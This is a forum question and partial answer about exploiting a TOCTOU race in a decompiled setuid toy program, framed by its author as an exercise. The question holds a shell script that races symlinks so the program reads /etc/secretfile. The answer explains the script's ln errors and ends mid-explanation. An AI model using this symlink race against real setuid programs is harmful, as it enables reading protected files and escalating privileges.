It's just an exercise. I am not trying to exploit something...
I have a setuid toy program to exploit(decompiled version):
int main(int argc, const char **argv)
{
int v3, v4, v5;
int result;
int v7;
int v8;
int v9;
int v10;
memset(&v9, 0, 0x14u);
if ( !access("/tmp/exploitme", 4) )
{
v3 = geteuid();
v4 = geteuid();
v5 = geteuid();
setresuid(v5, v4, v3, argv);
v8 = open("/tmp/exploitme", 0);
if ( v8 < 0 )
exit(-1);
read(v8, &v9, 0x13u);
write(1, &v9, 0x13u);
}
result = 0;
return result;
}
There exists race condition between the access and open.
So here is the script, I use the classical trick: alter nice value to reduce scheduling priority.
#!/bin/sh
touch /tmp/myfile
while true; do
ln -sf /tmp/myfile /tmp/exploitme &
nice -15 /workspace/toy &
ln -sf /etc/secretfile /tmp/exploitme &
done
But I get these errors from the script:
ln: failed to create symbolic link '/tmp/expolitme': File exists
ln: cannot remove '/tmp/expolit': No such file or directory
I already use -f option of ln to force create symlink. Why I have these errors?
The problem is with the way you call
ln-- multiple instances at the same time. The wayln"forces" symbolic links is that it unlinks (removes) the destination and recreates it again. But you are calling multiplelninstances at the same time which results in a race condition with other calls toln. Because one or more instances do unlink oftmp/exploitmebut some other instance has already created the new/tmp/exploitme; so the "file exists". If you don't spawn multiplelninstances in the background, you won't observe this problem.Let's me show an example with 2 instances: A and B